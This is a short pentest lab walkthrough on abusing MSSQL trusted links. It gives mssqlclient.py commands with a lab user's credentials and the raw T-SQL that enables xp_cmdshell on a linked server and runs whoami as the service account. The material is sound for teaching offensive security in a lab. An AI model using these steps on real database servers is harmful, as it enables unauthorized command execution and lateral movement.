MSSQL trusted links

  • Another SQL abuse we could try on the lab, is the usage of mssql trusted links.

Note that trusted link is also a forest to forest technique

  • To abuse the links let’s connect with elena.lopez and use enum_links

mssqlclient.py -windows-auth north.newyork.local/elena.lopez:princesa1@yonkers.north.newyork.local -show
enum_links

  • This play the following queries :

EXEC sp_linkedservers
EXEC sp_helplinkedsrvlogin

  • As we can see a linked server exist with the name Salisbury and a mapping exist with the user Elena.Lopez and sa on Salisbury.

  • If we use the link we can get a command injection on Salisbury:

use_link Salisbury
enable_xp_cmdshell
xp_cmdshell whoami

  • This play the following MSSQL commands :

EXEC ('select system_user as "username"') AT Salisbury
EXEC ('exec master.dbo.sp_configure ''show advanced options'',1;RECONFIGURE;exec master.dbo.sp_configure ''xp_cmdshell'', 1;RECONFIGURE;') AT Salisbury
EXEC ('exec master..xp_cmdshell ''whoami''') AT Salisbury

  • We got a command injection on Salisbury.Maryland.local as maryland\sql_svc\

PreviousMSSQL Coerce and relayNextMSSQL Command execution to shell - Yonkers

Last updated